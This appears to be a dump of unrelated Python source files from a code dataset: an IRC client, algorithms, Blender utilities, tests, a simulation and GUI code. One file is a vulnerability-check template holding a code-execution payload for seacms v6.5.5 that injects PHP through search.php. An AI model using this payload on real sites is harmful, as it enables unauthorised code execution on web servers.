#soc.send(self.channelName.join(\":\".join(self.messageInput)))\n #self.chatTextBox.delete(0, len(self.messageInput))\n\n def socketrun(self):\n self.clientSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.clientSock.connect(self.addressFamily)\n soc=self.clientSock\n socket_list=[sys.stdin,soc]\n print(\"Connected to server\")\n while True:\n r_list, w_list, err_list = select.select(socket_list, [], [])\n for socket_obj in r_list:\n\n if socket_obj == soc:\n #print(\"Server sent a msg\")\n\n self.serverMessage = soc.recv(1024).decode('UTF-8').strip()\n if self.serverMessage:\n #print(\"SERVER MESSAGE\", self.serverMessage)\n if self.serverMessage.startswith(\"PROVIDEANAME\"):\n sys.stdout.write('Register with a user name: \\n')\n\n elif self.serverMessage.startswith(\"LIST\"):\n sys.stdout.write(\"List of available groups %s\\n\" % self.serverMessage.split(\" \",1)[1][0:])\n # soc.send(bytes(self.channelName,'UTF-8'))\n elif self.serverMessage.startswith(\"MESSAGE\"):\n message =self.serverMessage.split(\":\", 1)[1][0:]\n sys.stdout.write(message)\n elif self.serverMessage.startswith(\"from\"):\n sys.stdout.write(self.serverMessage+\"\\n\")\n\n elif self.serverMessage.startswith(\"Bye\"):\n sys.stdout.write(self.serverMessage)\n sys.exit(1)\n else:\n print(\"SERVER's MESSAGE\", self.serverMessage)\n sys.stdout.write('>>>')\n\n \"\"\"\n elif self.serverMessage.startswith(\"SENDCOMMANDS\"):\n #print(self.serverMessage.split(\" \")[2:])\n self.command=sys.stdin.readline()\n soc.send(bytes(self.command,'UTF-8'))\n \"\"\"\n\n # soc.send(bytes(message,'UTF-8'))\n else:\n print(\"Server is down\")\n socket_obj.close()\n sys.exit(1)\n\n\n else:\n #print(\"Waiting for a command\")\n cmd = socket_obj.readline()\n soc.send(bytes(cmd, 'UTF-8'))\n sys.stdout.flush()\n\n\n\ns = SocketClientTest()\nprint(s.test)\ns.socketrun()\n","sub_path":"IRC/Client_new.py","file_name":"Client_new.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478156442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nname: 漏洞名称(禁止换行)控制在30字以内\nreferer: 漏洞地址(禁止换行)未知请填unknown\nauthor: 作者名\ndescription: 漏洞描述 \n'''\nimport sys\nimport requests\nimport warnings\ndef run(url):\n #此处编辑检测代码\n #示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果\n result = ['seacms v6.5.5代码执行漏洞','','']\n headers = {\n \"User-Agent\":\"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*\"\n url_path = url + \"/search.php?phpinfo();\"\n try:\n data = requests.get(url_path, timeout=3,headers=headers, verify=False)\n if data.status_code == 200 and 'phpinfo' in data.text:\n result[2]= \"存在\"\n result[1] = \"URL:%s\\nPOST:%s\"%(url_path,payload)\n else:\n result[2] = \"不存在\"\n except Exception as e:\n # print (e)\n result[2] =\"不存在\"\n #这里可设置未知,连接超时等,只有不存在不会显示到结果中。\n return result\n #最后一定要返回一个带有3个参数的列表。不然会出错误。\n\nif __name__ == \"__main__\":\n #此处不会调用\n warnings.filterwarnings(\"ignore\")\n testVuln = run(\"http://baidu.com\")\n print(testVuln)","sub_path":"POC模板.py","file_name":"POC模板.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309680183","text":"# In each loop, we first check what has the smaller x-coordinate: adding the next building from the input,\n# or removing the next building from the queue. In case of a tie, adding buildings wins, as that guarantees correctness (think about it :-).\n# We then either add all input buildings starting at that x-coordinate or we remove all queued buildings ending at that x-coordinate or earlier\n# (remember we keep buildings in the queue as long as they're \"under the roof\" of a larger actually alive building). And then, ' \\\n# 'if the current maximum height in the queue differs from the last in the skyline, ' \\\n# 'we add it to the skyline.\n\nfrom heapq import *\n\n\nclass Solution:\n def getSkyline(self, LRH):\n skyline = []\n i, n = 0, len(LRH)\n liveHR = []\n while i < n or liveHR:\n if not liveHR or i < n and LRH[i][0] <= -liveHR[0][1]: # adding the next building from the input\n x = LRH[i][0]\n while i < n and LRH[i][0] == x:\n heappush(liveHR, (-LRH[i][2], -LRH[i][1])) # using '-' because heapq is min heap ,change it to max heap\n i += 1\n else: # removing the next building from the queue\n x = -liveHR[0][1]\n while liveHR and -liveHR[0][1] <= x:\n heappop(liveHR)\n\n height = len(liveHR) and -liveHR[0][0] # return max height in heapq if heapq not empty otherwise return 0\n print(i,height)\n if not skyline or height != skyline[-1][1]:\n skyline += [x, height],\n return skyline\n\n\nsol = Solution()\nlrh = [[2, 9, 10], [3, 7, 15], [5, 12, 12], [15, 20, 10], [19, 24, 8]]\nprint(sol.getSkyline(lrh))\n","sub_path":"218.py","file_name":"218.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"348731698","text":"import bpy\nimport bmesh\nimport mathutils\nfrom .utils import *\n\ndef get_bounds(obj):\n return BoundingBox(obj)\n\ndef shift_verts(obj, move_amt):\n me = obj.data\n if me.is_editmode:\n bm = bmesh.from_edit_mesh(me)\n else:\n bm = bmesh.new()\n bm.from_mesh(me)\n for v in bm.verts:\n v.co += move_amt\n if bm.is_wrapped:\n bmesh.update_edit_mesh(me, False, False)\n else:\n bm.to_mesh(me)\n me.update()\n\ndef set_origin(obj, origin):\n loc, rot, scale = obj.matrix_local.decompose()\n offset = origin - loc\n offset = mathutils.Vector([offset[0] / scale[0], offset[1] / scale[1], offset[2] / scale[2]])\n me = obj.data\n if me.is_editmode:\n bm = bmesh.from_edit_mesh(me)\n else:\n bm = bmesh.new()\n bm.from_mesh(me)\n for v in bm.verts:\n v.co -= offset\n if bm.is_wrapped:\n bmesh.update_edit_mesh(me, False, False)\n else:\n bm.to_mesh(me)\n me.update()\n obj.matrix_local.translation = origin\n\n\nclass BoundingBoxBase:\n def get_dimensions(self):\n return mathutils.Vector(self.box_max) - mathutils.Vector(self.box_min)\n \n def set_from_object(self, obj):\n coords = [coord[:] for coord in obj.bound_box]\n axis_values = zip(*coords)\n min_vec, max_vec = {}, {}\n for i, values in enumerate(axis_values):\n min_vec[i] = min(values)\n max_vec[i] = max(values)\n self.box_min[i] = min(values)\n self.box_max[i] = max(values)\n \n def get_bottomfrontleft(self): return mathutils.Vector(self.box_min)\n def get_bottombackleft(self): return mathutils.Vector([self.box_min[0], self.box_max[1], self.box_min[2]])\n def get_topbackright(self): return mathutils.Vector(self.box_max)\n\n def copy(bounds):\n self.box_min = bounds.box_min\n self.box_max = bounds.box_max\n \n def get_topleft(self):\n return self.topleft\n\nclass BoundingBox(BoundingBoxBase):\n def __init__(self, obj):\n self.box_min = mathutils.Vector([0, 0, 0])\n self.box_max = mathutils.Vector([0, 0, 0])\n self.set_from_object(obj) \n\n\nclass BpyBoundingBox(bpy.types.PropertyGroup, BoundingBoxBase):\n def copy_into(self, other_bb):\n other_bb.box_min = self.box_min\n other_bb.box_max = self.box_max\n\n box_min : bpy.props.FloatVectorProperty(size=3, default=[0, 0, 0])\n box_max : bpy.props.FloatVectorProperty(size=3, default=[0, 0, 0])\n\ndef set_mesh_preserve_origin(obj, bm):\n original_bb = BoundingBox(obj)\n obj_size = original_bb.get_dimensions()\n if obj_size[0] == 0 or obj_size[1] == 0:\n tl = mathutils.Vector([0,0,0])\n else:\n tl = original_bb.get_bottombackleft()\n tl = mathutils.Vector([tl[0] / obj_size[0], tl[1] / obj_size[1], 0])\n apply_bmesh_to_object(obj, bm)\n new_bb = BoundingBox(obj)\n new_size = new_bb.get_dimensions()\n if new_size[0] == 0 or new_size[1] == 0:\n new_tl = mathutils.Vector([0,0,0])\n else:\n new_tl = new_bb.get_bottombackleft()\n new_tl = mathutils.Vector([new_tl[0] / new_size[0], new_tl[1] / new_size[1], 0])\n vert_move_amt = multiply_vec3((tl - new_tl), new_size)\n shift_verts(obj, vert_move_amt)","sub_path":"ObjUtils.py","file_name":"ObjUtils.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"110955650","text":"# python-holidays\n# ---------------\n# A fast, efficient Python library for generating country, province and state\n# specific sets of holidays on the fly. It aims to make determining whether a\n# specific date is a holiday as fast and flexible as possible.\n#\n# Authors: dr-prodigy (c) 2017-2023\n# ryanss (c) 2014-2017\n# Website: https://github.com/dr-prodigy/python-holidays\n# License: MIT (see LICENSE file)\n\nimport re\nfrom unittest import TestCase\n\nfrom holidays import country_holidays, list_supported_countries\n\n\nclass TestReadme(TestCase):\n @classmethod\n def setUpClass(cls):\n with open(\"README.rst\", encoding=\"utf-8\") as readme_file:\n cls.readme_content = \"\".join(readme_file.readlines())\n\n super().setUpClass()\n\n def test_supported_countries_count(self):\n actual_country_count = len(list_supported_countries(unique=True))\n readme_country_count = int(\n re.findall(\n r\"We currently support (\\d+) country codes.\",\n self.readme_content,\n )[0]\n )\n self.assertEqual(\n readme_country_count,\n actual_country_count,\n \"README.rst supported countries statement is out of date: \"\n f\"'We currently support {readme_country_count} countries'. \"\n f\"Actual supported countries count: {actual_country_count}\",\n )\n\n def test_supported_countries_table(self):\n # Parse table data.\n table_content = [\n line.strip()\n for line in re.findall(\n r\"Subdivisions Available(.*)Available Financial Markets\",\n self.readme_content,\n re.DOTALL,\n )[0].split(\"\\n\")\n if line\n ]\n country_names = []\n country_alpha_2_codes = set()\n country_subdivisions = {}\n subdivisions_re = re.compile(\".*: (.*)\")\n for idx in range(0, len(table_content), 3): # 3 column table.\n # 1st column.\n name = table_content[idx].strip(\" *-\").replace(\" \", \"\").lower()\n country_names.append(name)\n\n # 2nd column.\n alpha_2_code = table_content[idx + 1].strip(\" -\")\n if alpha_2_code:\n country_alpha_2_codes.add(alpha_2_code)\n\n # 3rd column.\n country_subdivisions[alpha_2_code] = []\n subdivisions = table_content[idx + 2].split(\".\")\n for subdivision in subdivisions:\n subdivision_group = subdivision.split(\";\")[0].strip(\" -\")\n # Exclude empty subdivisions.\n if subdivision_group.startswith(\"None\") or alpha_2_code == \"\":\n country_subdivisions[alpha_2_code] = []\n continue\n\n # Combine all subdivision codes.\n country_subdivisions[alpha_2_code].extend(\n [\n subdivision_code.replace(\"(default)\", \"\").strip(\"* \")\n for subdivision_code in subdivisions_re.findall(\n subdivision_group\n )[0].split(\",\")\n ]\n )\n\n # Check data.\n self.assertEqual(\n country_names,\n sorted(country_names),\n \"The supported countries table must be sorted alphabetically by \"\n \"country name.\\n\"\n + \"\\n\".join(\n (\n f\"{c} != {s}\"\n for c, s in zip(country_names, sorted(country_names))\n if c != s\n )\n ),\n )\n\n country_names = set(c.split(\"(the)\")[0] for c in country_names)\n supported_countries = list_supported_countries(unique=True)\n for country_alpha_2_code in supported_countries:\n country = country_holidays(country_alpha_2_code)\n country_name = country.__class__.__base__.__name__\n\n # Make sure country name is shown correctly.\n if country_name.startswith(\"Holiday\"):\n self.assertIn(\n country_name[8:],\n country_alpha_2_codes,\n f\"Country class '{country_name}' is not shown correctly \"\n \"in the table.\",\n )\n else:\n self.assertIn(\n country_name.lower().replace(\n \"unitedstates\", \"unitedstatesofamerica\"\n ),\n country_names,\n f\"Country class '{country_name}' is not shown correctly \"\n \"in the table.\",\n )\n\n # Make sure country alpha-2 code is shown correctly.\n self.assertIn(\n country.country,\n country_alpha_2_codes,\n f\"Country alpha-2 code '{country_alpha_2_code}' is not \"\n \"shown correctly in the table.\",\n )\n\n # Make sure country subdivisions are shown correctly.\n self.assertEqual(\n supported_countries[country_alpha_2_code],\n country_subdivisions[country_alpha_2_code],\n f\"Country class '{country_name}' subdivisions are not \"\n \"shown correctly in the table.\\n\"\n + \"\\n\".join(\n (\n f\"{c} != {s}\"\n for c, s in zip(\n supported_countries[country_alpha_2_code],\n country_subdivisions[country_alpha_2_code],\n )\n if c != s\n )\n ),\n )\n","sub_path":"tests/test_docs.py","file_name":"test_docs.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10547490","text":"import os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim\nimport numpy as np\nimport librosa\nimport matplotlib as mpl\nmpl.use('pdf')\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix\n\nfrom custom_logging import get_logger\nfrom util import print_cm, get_time_stamp, pickle_load\n\nfrom data.TestDatasetManifest import TestDatasetManifest\nfrom data.WindowedMFCCFeatureExtractor import WindowedMFCCFeatureExtractor\nfrom SelfAttentionWindows._unittest_train_attwin import LSfcAttX\n\n\nplt.rc('font', family='serif', serif='Times')\nplt.rc('text', usetex=True)\nmpl.rcParams['text.latex.preamble'] = [r'\\usepackage{mathptmx}',\n r'\\usepackage[T1]{fontenc}',\n r'\\usepackage[utf8]{inputenc}',\n r'\\usepackage{pslatex}']\nplt.rc('xtick', labelsize=4)\nplt.rc('ytick', labelsize=4)\nplt.rc('axes', labelsize=6)\n\ns_logger = get_logger(__name__)\n\n\ndef sample(opt):\n torch.manual_seed(opt['seed'])\n torch.cuda.manual_seed_all(opt['seed'])\n np.random.seed(opt['seed'])\n\n device = torch.device(\"cuda\" if opt['cuda'] else 'cpu')\n\n test_manifest = TestDatasetManifest(opt, quiet=False)\n feature_extractor = pickle_load(os.path.join(opt[\"from_dir\"], \"feature_extractor.pkl\"))\n\n opt[\"sample_rate\"] = 44100\n opt[\"save_dir\"] = None\n\n model = LSfcAttX(opt)\n from_path = os.path.join(opt[\"from_dir\"], 'model_best.ckpt')\n if not os.path.exists(from_path):\n s_logger.error(\"No model checkpoint at {}!\".format(from_path))\n return\n\n model.load_state_dict(torch.load(from_path))\n\n print(model)\n model = model.to(device)\n\n actuals = []\n preds = []\n sm = torch.nn.LogSoftmax(dim=1)\n\n # Do a random subset\n num_subset = 14\n # num_subset = 4\n\n fig, axes = plt.subplots(7, 2)\n # fig, axes = plt.subplots(2, 2)\n # fig.set_size_inches(8, 11)\n # fig.subplots_adjust()\n minute = 60 * opt[\"sample_rate\"]\n seconds_per_window = int(np.floor(60. / feature_extractor.windows_per_minute))\n\n clss = {0: 'NON-PROG', 1: 'PROG'}\n\n x, y = 0, 0\n with torch.no_grad():\n for i, (full_path, target) in enumerate(np.random.permutation(test_manifest.manifest)[:num_subset]):\n s_logger.info(\"Start song:\\t{}\".format(full_path))\n x_i, _ = librosa.load(full_path, sr=opt[\"sample_rate\"], mono=True)\n feat_tensor = feature_extractor.extract_feature(x_i)\n inputs = feat_tensor.float().unsqueeze(0).unsqueeze(0)\n\n seq_length = feat_tensor.size(1)\n input_percentages = torch.FloatTensor(1)\n input_percentages[0] = seq_length / float(seq_length)\n\n inputs = inputs.to(device)\n actuals.extend([target])\n\n wx, attention_weights = model(inputs, input_percentages, give_attention=True)\n attention_weights = attention_weights.squeeze(2).detach().cpu().numpy()\n probas = sm(wx)\n # probas = probas.mean(dim=1)\n\n probas = probas.detach().cpu().numpy()\n preds_i = np.argmax(probas, axis=1)\n s_logger.info(\"Pred:\\t{}\".format(preds_i[0]))\n preds.extend(list(preds_i))\n\n # Graphing\n num_minutes = int(np.ceil(float(len(x_i)) / minute))\n real_x = np.zeros(num_minutes * minute)\n\n real_x[:len(x_i)] = x_i\n idxes = np.random.permutation(np.arange(len(real_x)))[:1000 * num_minutes]\n idxes = np.asarray(np.sort(idxes))\n\n t = np.linspace(0, len(real_x) / opt[\"sample_rate\"], num=len(real_x))\n t = np.random.permutation(t)[:1000 * num_minutes]\n t = sorted(t)\n axes[y, x].plot(t, real_x[idxes])\n\n for j, x_j in enumerate(np.arange(0, num_minutes * 60, seconds_per_window)):\n end = min(x_j + seconds_per_window, num_minutes * 60)\n print(\"Window {}-{}/{}\".format(x_j, end, num_minutes * 60))\n axes[y, x].axvspan(x_j, end, color='red', alpha=float(attention_weights[0, j]), lw=0)\n\n axes[y, x].set_ylim((-1.5, 1.5))\n myouji = '/'.join(full_path.split('/')[-2:])\n myouji = myouji.replace('_', ' ')\n if len(myouji) > 27:\n myouji = myouji[:27]\n myouji = myouji + \"...\"\n title_i = \"{} - Pred: {}\".format(myouji, clss[preds_i[0]])\n axes[y, x].title.set_text(title_i)\n axes[y, x].title.set_fontsize(8)\n\n x += 1\n if x >= 2:\n x = 0\n y += 1\n # break\n\n # plt.show()\n fig.set_size_inches(7, 10)\n fig.subplots_adjust(left=0.05, right=0.97, top=0.95, bottom=0.05, hspace=0.5)\n fig.savefig('7x10-{}_{}.pdf'.format(''.join(opt[\"root_test\"].split('/')[-2:]), get_time_stamp()))\n\n # acc = accuracy_score(actuals, preds)\n # prec = precision_score(actuals, preds)\n # rec = recall_score(actuals, preds)\n # cm = confusion_matrix(actuals, preds)\n #\n # print_cm(cm, [\"nonprogR\", \"progR\"])\n # s_logger.info(\"=\\tAccuracy:\\t{}\".format(acc))\n # s_logger.info(\"=\\tPrecision:\\t{}\".format(prec))\n # s_logger.info(\"=\\tRecall:\\t{}\".format(rec))\n #\n # metrics = {'accuracy': acc, 'precision': prec, 'recall': rec, 'cm': cm}\n\n\nif __name__ == '__main__':\n opt = argparse.ArgumentParser()\n opt.add_argument('--root_test',\n required=True,\n help='Root directory of TEST MP3 files.')\n\n opt.add_argument('--from_dir',\n required=True,\n help='Directory to load checkpoint from.')\n\n opt.add_argument('--num_workers',\n default=4,\n help='Number of available threads for data loading')\n opt.add_argument('-b', '--batch_size',\n default=512,\n help='Model input batch size.')\n opt.add_argument('-s', '--seed',\n default=9,\n help='Model seed.')\n opt.add_argument('--cuda',\n action='store_true',\n default=False,\n help='Use CUDA.')\n\n opt = opt.parse_args()\n opt = vars(opt)\n\n sample(opt)\n","sub_path":"SelfAttentionWindows/visualize_test.py","file_name":"visualize_test.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"311870551","text":"#-*- coding:utf-8 -*-\n#问题:将整数转化为任意进制字符串\n#递归三核心:\n# 1、递归算法必须具有基本情况。当数值比进制数小的时候,可以直接输出,而且\n# 任意进制的字符串可以用\"0123456789ABCDEF\"\n# 2、递归算法必须改变其状态并向基本情况靠近。改变状态就是要把整数的数据缩小,考虑用除法,\n# 由于除法后的数比源数小,所以状态在改变,并且靠近。且余数就是可以直接获取的值。\n# 余数和除数。\n# 3、必须递归自身。\n#特点:递归时,有堆栈存储元素,把最后操作栈数据,写在了递归函数过程中。\ndef toStr(n,base):\n \"\"\"\n @n 整数\n @base 进制\n \"\"\"\n exStr = \"0123456789ABCDEF\"\n if n < base:\n return exStr[n]\n else:\n return toStr(n//base, base) + exStr[n%base]\n\n\nif __name__ == '__main__':\n result = toStr(100000000, 2)\n print(result)\n","sub_path":"code/python/数据结构/迭代/递归三核心/整数转换为任意进制字符串.py","file_name":"整数转换为任意进制字符串.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"104704907","text":"# -*- coding: utf-8 -*-\n# @Author: 何睿\n# @Create Date: 2018-09-03 10:42:26\n# @Last Modified by: 何睿\n# @Last Modified time: 2018-09-03 10:44:36\n\nimport re\nimport os\nimport codecs\nimport imghdr\nimport PIL.Image\nimport collections\nimport glob\nimport chardet\nfrom itertools import combinations\n\n# 统计英文文章的所有英文单词数\n\n\ndef calculate_english_words_in_text(filepath):\n words_count = 0\n try:\n with codecs.open(filepath, 'r', 'utf-8') as target:\n for line in target.readlines():\n words = re.findall(\"[a-zA-Z]+'*-*[a-zA-Z]*\", line)\n words_count += len(words)\n return words_count\n except IOError:\n print(\"文件读取失败,请检查文件路径\")\n\n\n# 把图片缩小至指定大小\ndef change_resoultion_to_less(pic_folder, re_w=1136, re_h=640):\n for pic_name in os.listdir(pic_folder):\n pic_path = os.path.join(pic_folder, pic_name)\n if imghdr.what(pic_path) == 'jpeg':\n with PIL.Image.open(pic_path) as target:\n w, h = target.size\n n = w / re_w if w / re_w >= h / re_h else h / re_h\n nw = int(w / n)\n nh = int(h / n)\n target.resize((nw, nh))\n target.save(pic_folder + '\\\\' + \"resize\" +\n pic_name.split('.')[0] + '.jpg', 'jpeg')\n\n\ndef not_empty(s):\n return s and s.strip()\n\n\n# 统计txt文件中的词频,file_path为文件路径,frerecy统计前%个单词\ndef count_word_frequency_in_txt(file_path, frecency):\n with codecs.open(file_path, 'r', 'utf-8') as file:\n words = []\n for line in file:\n content = re.sub(r\"\\\"|,|\\.|\\”|\\“|\\‘|\\t\", \" \", line)\n words.extend(content.strip().split(' '))\n # 去掉空字符\n res = filter(not_empty, words)\n return collections.Counter(res).most_common(int(abs(frecency)))\n\n\n# 判断文件的编码格式,参数为完整路径名,返回格式编码\ndef get_charcode(file):\n with open(file, 'rb') as f:\n content = f.read()\n return (chardet.detect(content).get('encoding'))\n\n\n# 得到父文件夹下的所有文件夹,参数为父文件夹路径,返回包含路径的set\ndef get_all_folders(directory):\n directorys = set()\n for dir_path, dir_names, file_names in os.walk(directory):\n for dir_name in dir_names:\n path = dir_path + \"\\\\\" + dir_name\n directorys.add(path)\n file_names = file_names\n return directorys\n\n\n# 得到父文件夹下指定文件类型(文件名后缀)文件的完整路径,如果没有指定,则返回所有文件的完整路径,\ndef get_all_files(directory, filetype=None):\n directorys = []\n for dir_path, dir_names, file_names in os.walk(directory):\n # 如果输入了文件类型,则按类型查找\n if filetype:\n try:\n directorys += glob.glob(dir_path + '\\\\*.' + filetype)\n except Exception as e:\n print(e)\n # 如果没有输入,则返回所有的文件\n else:\n for file_name in file_names:\n path = dir_path + \"\\\\\" + file_name\n directorys.append(path)\n dir_names = dir_names\n return directorys\n\n\n# 输入文件路径,返回文件名称\ndef get_file_name(path):\n try:\n return path.split('\\\\')[len(path.split('\\\\')) - 1]\n except Exception as e:\n print(e)\n\n\n# 输入参数:string,返回参数:string\n# 功能: 去掉string中的中文字符\ndef remove_chinese_punctuation(string):\n return re.sub(\n r\"[A-Za-z0-9\\s+\\.\\!\\/_,$%^*(+\\\"\\']+|[+——!,。?、~@#¥%……&*()“”:;《》?:=>【】-]+\", \"\",\n string)\n\n\n\"\"\"\n输入参数:\n keywords 需要形成组合的关键词,list类型;\n words 需要匹配的单词,list类型\n nearby_words_num 求组和的最大相邻个数,默认为15\n combination_num 每个组合的个数,默认为2\n返回格式:\n ['补偿', '风险', 2],list类型\n\"\"\"\n\n\ndef calculate_nearby_words(keywords, words, nearby_words_num=15, combination_num=2):\n # 关键词的不同组合方式\n keywords_combinations = []\n # 对关键词的组合排序\n for item in list(combinations(keywords, combination_num)):\n keywords_combinations.append(sorted(item))\n # 记录每个组合的次数,初始化为0\n times_every_combination = [0 for i in range(len(keywords_combinations))]\n son_words_one = words[0:nearby_words_num]\n son_words_two = words[nearby_words_num]\n combination_temp = []\n for item in list(combinations(son_words_one, combination_num)):\n combination_temp.append(sorted(item))\n for item in combination_temp:\n if item in keywords_combinations:\n times_every_combination[keywords_combinations.index(item)] += 1\n start_positon = 1\n for i in range(nearby_words_num, len(words)):\n son_words_one = words[start_positon:start_positon+nearby_words_num-1]\n son_words_two = words[start_positon +\n nearby_words_num-1:start_positon+nearby_words_num]\n start_positon += 1\n if son_words_two[0] in keywords:\n temp_list = [[x, y] for x in son_words_one for y in son_words_two]\n combination_temp = []\n for item in temp_list:\n combination_temp.append(sorted(item))\n for item in combination_temp:\n if item in keywords_combinations:\n times_every_combination[keywords_combinations.index(\n item)] += 1\n else:\n continue\n reslut = []\n for i in range(len(keywords_combinations)):\n if times_every_combination[i] != 0:\n keywords_combinations[i].append(times_every_combination[i])\n reslut.append(keywords_combinations[i])\n return reslut\n\n\ndef remove_last_brackets(dry):\n dry = re.sub(\" \", \"\", dry)\n length = len(dry)\n last_left_br = length - 1\n try:\n ch_last_right_br = dry.rindex(\")\")\n except:\n ch_last_right_br = -1\n try:\n en_last_right_br = dry.rindex(\")\")\n except:\n en_last_right_br = -1\n if ch_last_right_br > 0 or en_last_right_br > 0:\n last_left_br = length - 2\n return dry[:last_left_br]\n\n\ndef find_lcsubstr(s1, s2):\n \"找两个字符串的最长公共字串\"\n m = [[0 for i in range(len(s2) + 1)] for j in range(len(s1) + 1)]\n mmax = 0 # 最长匹配的长度\n p = 0 # 最长匹配对应在s1中的最后一位\n for i in range(len(s1)):\n for j in range(len(s2)):\n if s1[i] == s2[j]:\n m[i + 1][j + 1] = m[i][j] + 1\n if m[i + 1][j + 1] > mmax:\n mmax = m[i + 1][j + 1]\n p = i + 1\n return s1[p - mmax:p], mmax, p-mmax # 最长字串,长度,在串1中的起始地址\n","sub_path":"Learn/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"167492677","text":"\"\"\"\nModule to implement a plugin that looks for multiple spaces after the hash\nmark on a atx heading.\n\"\"\"\nfrom pymarkdown.markdown_token import (\n AtxHeadingMarkdownToken,\n EndMarkdownToken,\n MarkdownToken,\n TextMarkdownToken,\n)\nfrom pymarkdown.plugin_manager import Plugin, PluginDetails\n\n\nclass RuleMd019(Plugin):\n \"\"\"\n Class to implement a plugin that looks for multiple spaces after the hash\n mark on a atx heading.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.__in_atx_heading = None\n\n def get_details(self):\n \"\"\"\n Get the details for the plugin.\n \"\"\"\n return PluginDetails(\n # headings, headers, atx, spaces\n plugin_name=\"no-multiple-space-atx\",\n plugin_id=\"MD019\",\n plugin_enabled_by_default=True,\n plugin_description=\"Multiple spaces after hash on atx style heading\",\n ) # https://github.com/DavidAnson/markdownlint/blob/master/doc/Rules.md#md019---multiple-spaces-after-hash-on-atx-style-heading\n\n def starting_new_file(self):\n \"\"\"\n Event that the a new file to be scanned is starting.\n \"\"\"\n self.__in_atx_heading = None\n\n def next_token(self, token):\n \"\"\"\n Event that a new token is being processed.\n \"\"\"\n if isinstance(token, AtxHeadingMarkdownToken):\n self.__in_atx_heading = not token.remove_trailing_count\n elif isinstance(token, EndMarkdownToken):\n if token.type_name == MarkdownToken.token_paragraph:\n self.__in_atx_heading = False\n elif isinstance(token, TextMarkdownToken):\n if self.__in_atx_heading and len(token.extracted_whitespace) > 1:\n self.report_next_token_error(token)\n","sub_path":"pymarkdown/plugins/rule_md_019.py","file_name":"rule_md_019.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519114628","text":"'''\nA simulation of the flu transmission model (testing a location-awareness).\n'''\n\nfrom pram.sim import Simulation\nfrom pram.entity import AttrFluStage, GroupQry, GroupSplitSpec, Site\nfrom pram.data import GroupSizeProbe\nfrom pram.rule import GotoRule, Rule, TimeInt, TimePoint\n\n\nrand_seed = 1928\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nsites = {\n 'home' : Site('home'),\n 'school-a' : Site('school-a'),\n 'school-b' : Site('school-b')\n}\n\nprobe_grp_size_flu = GroupSizeProbe.by_attr('flu', 'flu-stage', AttrFluStage, memo='Mass distribution across flu stages')\nprobe_grp_size_site = GroupSizeProbe.by_rel('site', Site.AT, sites.values(), memo='Mass distribution across sites')\n\n(Simulation(1,1,14, rand_seed=rand_seed). # 14-day simulation\n new_group('A', 500).\n set_attr('flu-stage', AttrFluStage.NO).\n set_rel(Site.AT, sites['home']).\n set_rel('home', sites['home']).\n set_rel('school', sites['school-a']).\n commit().\n new_group('B', 500).\n set_attr('flu-stage', AttrFluStage.NO).\n set_rel(Site.AT, sites['home']).\n set_rel('home', sites['home']).\n set_rel('school', sites['school-b']).\n commit().\n add_rule(GotoSchoolFluRule()).\n add_rule(GotoHomeFluRule()).\n add_rule(ProgressFlu02Rule()).\n # add_probe(probe_grp_size_flu).\n add_probe(probe_grp_size_site).\n # summary((False, True, False, False, False), (0,1)).\n # run(1).summary((False, True, False, False, False), (1,1)).\n # run(1).summary((False, True, False, False, False), (1,1)).\n # run(1).summary((False, True, False, False, False), (1,1)).\n # run(1).summary((False, True, False, False, False), (1,1))\n # run().summary((False, True, False, False, False), (1,1))\n run()\n)\n","sub_path":"src/sim_05_flu_transmission.py","file_name":"sim_05_flu_transmission.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"588902315","text":"\n\nimport sys\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\n\nclass MainWindow(QMainWindow):\n \"\"\"The main window for my application\"\"\"\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Hello world\")\n self.stacked_layout = QStackedLayout()\n self.create_initial_layout()\n self.create_hello_layout()\n self.stacked_layout.setCurrentIndex(0)\n\n self.initial_widget = QWidget()\n self.initial_widget.setLayout(self.stacked_layout)\n self.setCentralWidget(self.initial_widget)\n\n\n\n def create_initial_layout(self):\n self.label = QLabel(\"Enter your name\")\n self.text_box = QLineEdit()\n self.submit_button = QPushButton(\"submit\")\n\n\n self.layout = QVBoxLayout()\n \n self.layout.addWidget(self.label)\n self.layout.addWidget(self.text_box)\n 